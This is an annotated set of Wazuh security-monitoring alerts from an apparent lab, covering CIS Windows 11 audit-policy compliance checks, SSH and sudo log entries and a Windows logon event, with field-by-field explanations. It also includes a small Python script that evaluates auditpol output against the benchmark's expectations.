data.sca.check.description: This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.2 Section number of this check in the CIS benchmark named in data.sca.policy.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check maps to (Control 8, Audit Log Management).
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authentication Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed One of passed, failed or not applicable. passed means the subcategory already includes Success; nothing to do.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] CIS Critical Security Controls safeguard the rule maps to (Control 8, Audit Log Management); mirrors data.sca.check.compliance.cis_csc.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534682.2371559 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check carries one benchmark test's result, summary carries the totals for the whole scan.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26163 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authorization Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.3 Section number of this check in the CIS benchmark named in data.sca.policy.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check maps to (Control 8, Audit Log Management).
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authorization Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed One of passed, failed or not applicable. failed means the subcategory does not include Success, so user-right assignments (4704/4705) on this host are currently not being logged.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2374351 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:44.558262+00:00 server1 sshd[3469]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:44.558262+00:00 Timestamp lifted from the log line itself by the pre-decoder. Compare it with the alert time to spot delivery lag or clock skew on the agent.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) Account the PAM session was opened for, exactly as pam_unix prints it (name plus uid).
data.uid: 0 Uid taken from the "by simba(uid=0)" part of the line. pam_unix reports the real uid of the process that opened the session, which for SSH is the privileged sshd parent running as root, so 0 here does not mean simba has root; simba's own uid is 1000 in data.dstuser.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2374810 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:44.552511+00:00 server1 sshd[3469]: Accepted password for simba from 192.168.6.135 port 57242 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:44.552511+00:00 Timestamp lifted from the log line itself by the pre-decoder; note it is a few milliseconds before the pam session line above, which is the expected order (authentication, then session).
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 Client IP the SSH login came from. It is not the Attacker agent (192.168.6.131), so a different host on the same subnet is logging into the manager; confirm it is one of yours.
data.srcport: 57242 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba Account that was authenticated. The raw line says "Accepted password", so password authentication is enabled on the manager; check that this is intended rather than key-only access.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] CIS Critical Security Controls safeguard the rule maps to (Control 8, Audit Log Management); mirrors data.sca.check.compliance.cis_csc.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2375277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check carries one benchmark test's result, summary carries the totals for the whole scan.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26164 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.4 Section number of this check in the CIS benchmark named in data.sca.policy.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check maps to (Control 8, Audit Log Management).
data.sca.check.command: ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed One of passed, failed or not applicable. This title demands exactly Success and Failure, so a subcategory set to Success only still fails; firewall rule changes (4946-4948) on this host are not being fully logged.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
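The five auditpol checks above (CIS 17.6.4 and 17.7.1 through 17.7.4) all read the same thing, the Inclusion Setting of one audit subcategory, and differ only in whether the title demands exactly 'Success and Failure' or merely that 'Success' be included. The Python script below is an added example, not Wazuh's or CIS's code: it parses the CSV that `auditpol /get /category:* /r` prints on Windows, applies those two kinds of expectation, and emits the `auditpol /set` line for each failing subcategory. The SCA checks themselves run the non-CSV `auditpol.exe /get /subcategory:"..."` form and match its text, but the CSV form is easier to parse reliably. The EXPECTED table is derived from the check titles on this page; the sample CSV is constructed to reproduce the two passes and three failures shown above, and its GUID column is not read by the parser.

```python
"""Evaluate Windows audit subcategories the way the CIS checks above do.

Added example, not Wazuh or CIS code. Input is the CSV printed by
`auditpol /get /category:* /r`.
"""
import csv
import io
import sys

# Expectation per subcategory, taken from the check titles on this page.
# "exact": the Inclusion Setting must be precisely this value.
# "include": the named setting must be present ("Success" is satisfied by
# "Success" and by "Success and Failure").
EXPECTED = {
    "Removable Storage": ("exact", "Success and Failure"),                # CIS 17.6.4
    "Audit Policy Change": ("include", "Success"),                        # CIS 17.7.1
    "Authentication Policy Change": ("include", "Success"),               # CIS 17.7.2
    "Authorization Policy Change": ("include", "Success"),                # CIS 17.7.3
    "MPSSVC Rule-Level Policy Change": ("exact", "Success and Failure"),  # CIS 17.7.4
}

# Constructed sample in the layout auditpol /r prints, trimmed to the five
# subcategories. Values chosen to reproduce the alerts above: two pass,
# three fail. The GUID column is not used by the parser.
SAMPLE_AUDITPOL_CSV = """Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting
ATTACKER,System,Removable Storage,{0CCE9245-69AE-11D9-BED3-505054503030},No Auditing,
ATTACKER,System,Audit Policy Change,{0CCE922F-69AE-11D9-BED3-505054503030},Success,
ATTACKER,System,Authentication Policy Change,{0CCE9230-69AE-11D9-BED3-505054503030},Success and Failure,
ATTACKER,System,Authorization Policy Change,{0CCE9231-69AE-11D9-BED3-505054503030},No Auditing,
ATTACKER,System,MPSSVC Rule-Level Policy Change,{0CCE9232-69AE-11D9-BED3-505054503030},Success,
"""


def parse_auditpol_csv(text):
    """Map subcategory name -> Inclusion Setting from auditpol /r output."""
    # Real output starts with a BOM and a blank line; strip both.
    text = text.lstrip("\ufeff\r\n")
    return {
        row["Subcategory"].strip(): row["Inclusion Setting"].strip()
        for row in csv.DictReader(io.StringIO(text))
    }


def evaluate(settings):
    """Return {subcategory: (passed, actual_setting)} for every EXPECTED entry.

    A subcategory missing from the input counts as "No Auditing", which is
    what auditpol reports for an unconfigured subcategory."""
    results = {}
    for sub, (mode, want) in EXPECTED.items():
        actual = settings.get(sub, "No Auditing")
        if mode == "exact":
            ok = actual == want
        else:
            ok = want in actual.split(" and ")
        results[sub] = (ok, actual)
    return results


def remediation_commands(results):
    """auditpol /set lines for each failing subcategory, matching its mode."""
    cmds = []
    for sub, (ok, _actual) in results.items():
        if ok:
            continue
        mode, _want = EXPECTED[sub]
        flags = "/success:enable /failure:enable" if mode == "exact" else "/success:enable"
        cmds.append(f'auditpol /set /subcategory:"{sub}" {flags}')
    return cmds


def read_auditpol_file(path):
    """Decode a saved capture: PowerShell redirection writes UTF-16 LE with a
    BOM, cmd.exe writes the OEM code page (plain ASCII for these values)."""
    raw = open(path, "rb").read()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    text = read_auditpol_file(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_AUDITPOL_CSV
    findings = evaluate(parse_auditpol_csv(text))
    for sub, (ok, actual) in findings.items():
        print(f"{'PASS' if ok else 'FAIL'}  {sub}: {actual}")
    for cmd in remediation_commands(findings):
        print("fix:", cmd)
```

On the Windows host, run `auditpol /get /category:* /r > audit.csv` from an elevated prompt and pass the file as the first argument; with no argument the script evaluates the constructed sample. A local `auditpol /set` is overwritten at the next Group Policy refresh if a GPO configures Advanced Audit Policy, which is why the CIS remediation text points at the GPO path rather than at auditpol.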
rule.description: SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32) Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19004 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534694.2380503 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: summary Kind of SCA event: summary carries the totals and score for the whole scan; the individual results arrive as type check with the same data.sca.scan_id.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.description: This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11. Free-text description of the benchmark, taken from the policy file header.
data.sca.policy_id: cis_win11_enterprise_21H2 String identifier of the policy as declared in its YAML file (not numeric). Filter on it to pull every alert from the same benchmark.
data.sca.passed: 126 Checks that were green – a quick confidence boost.
data.sca.failed: 260 Number of failed checks in the scan. Lots of red means poor hygiene.
data.sca.invalid: 9 Checks that couldn’t run (permissions, missing file, etc.).
data.sca.total_checks: 395 Total tests executed this run.
data.sca.score: 32 Overall compliance score as a percentage: passed / (passed + failed), with invalid checks left out, so 126 / 386 = 32 here. Under 85% usually needs remediation.
data.sca.file: cis_win11_enterprise.yml Policy YAML file the agent ran; the check titles, commands and remediation text all come from this file.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.5'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] CIS Critical Security Controls safeguard the rule maps to (5.2 sits under Control 5, Account Management); mirrors data.sca.check.compliance.cis_csc.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534694.2381818 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26004 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Password must meet complexity requirements' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting checks all new passwords to ensure that they meet basic requirements for strong passwords. When this policy is enabled, passwords must meet the following minimum requirements: - Not contain the user's account name or parts of the user's full name that exceed two consecutive characters - Be at least six characters in length - Contain characters from three of the following categories: - English uppercase characters (A through Z) - English lowercase characters (a through z) - Base 10 digits (0 through 9) - Non-alphabetic characters (for example, !, $, #, %) - A catch-all category of any Unicode character that does not fall under the previous four categories. This fifth category can be regionally specific. Each additional character in a password increases its complexity exponentially. For instance, a seven-character, all lower-case alphabetic password would have 26^7 (approximately 8 x 10^9 or 8 billion) possible combinations. At 1,000,000 attempts per second (a capability of many password-cracking utilities), it would only take 133 minutes to crack. A seven-character alphabetic password with case sensitivity has 52^7 combinations. A seven-character case-sensitive alphanumeric password without punctuation has 62^7 combinations. An eight-character password has 26^8 (or 2 x 10^11) possible combinations. Although this might seem to be a large number, at 1,000,000 attempts per second it would take only 59 hours to try all possible passwords. Remember, these times will significantly increase for passwords that use ALT characters and other special keyboard characters such as '!' or '@'. Proper use of the password settings can help make it difficult to mount a brute force attack. The recommended state for this setting is: Enabled.
Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Passwords that contain only alphanumeric characters are extremely easy to discover with several publicly available tools. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Password must meet complexity requirements Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.5 Section number of this check in the CIS benchmark named in data.sca.policy (section 1.1 is Password Policy).
data.sca.check.compliance.cis_csc: 5.2 CIS Critical Security Controls safeguard this check maps to (Control 5, Account Management).
data.sca.check.command: ['powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable One of passed, failed or not applicable. not applicable means the check could not be evaluated; it is not a pass.
data.sca.check.reason: Timeout overtaken running command 'powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser' Why the check was not evaluated. The AD cmdlet timed out, which is the likely outcome when the ActiveDirectory PowerShell module is absent or the host is not domain-joined, so the password policy on this host is unverified rather than compliant.
data.sca.check.previous_result: failed Last run's result. Going from failed to not applicable is not a fix: the control was failing and is now unmeasured, so treat it as still failing until the check runs to completion.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2389057 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.791511+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.791511+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sudo Parent decoder used – for nested parsing.
decoder.name: sudo Name of the Wazuh decoder that parsed this raw log.
decoder.ftscomment: First time user executed the sudo command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: root No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.tty: pts/0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.pwd: /home/simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.command: /usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2389646 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.795776+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.795776+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: root(uid=0) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 1000 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2390097 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.829022+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.829022+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: root No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534757.2390482 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:44:43.8159628Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43949 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
